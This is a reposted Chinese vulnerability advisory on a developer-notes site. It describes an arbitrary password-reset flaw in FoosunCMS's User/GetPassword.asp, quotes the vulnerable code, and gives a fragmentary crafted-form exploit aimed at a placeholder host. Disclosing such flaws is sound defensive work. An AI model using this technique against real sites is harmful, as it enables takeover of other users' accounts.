首页   技术笔记   网址导航   Json在线解析   二维码   Ip地址查询   在线流程图  
新用户注册 | 会员登录
当前位置:  开发笔记 > 数据库 > 正文

风讯网站管理系统 漏洞

作者:家具销售_903 | 2021-09-06 03:04
风讯网站管理系统任意修改密码漏洞FoosunCMS是一款具有强大的功能的基于ASP+ACCESSMSSQL构架的内容管理软件。漏洞分析:在文件\User\GetPassword.asp中:ElseIfRequest.Form(Action)step3then第28行Callstep3()Substep3()第198行Dimp

风讯网站管理系统 任意修改密码漏洞

FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。
漏洞分析:

在文件\User\ GetPassword.asp中:
 

ElseIf Request.Form("Action") = "step3" then //第28行 Call step3() …… Sub step3() //第198行 Dim p_pass_new,p_confim_pass_new p_pass_new = md5(Request.Form("pass_new"),16) …… User_Conn.execute("Update FS_ME_Users set UserPassword ='"& NoSqlHack(p_pass_new) &"' where UserName = '"& NoSqlHack(StrUserName) &"' and Email = '"& NoSqlHack(Replace(Request.Form("Email"),"''",""))&"'") //第220行
用户可以本地构造表单使程序直接进入修改密码,只需要知道用户名和邮箱。


漏洞利用:

id="form1" name="form1" method="post" action=http://www.xxxx.com/User/GetPassword.asp> ******@163.com" />

推荐阅读
devbox
家具销售_903
这个屌丝很懒,什么也没留下!
关注作者
Tags | 热门标签
RankList | 热门文章
DevBox开发工具箱 | 专业的在线开发工具网站    京公网安备 11010802040832号  |  京ICP备19059560号-6
Copyright © 1998 - 2020 DevBox.CN. All Rights Reserved devBox.cn 开发工具箱 版权所有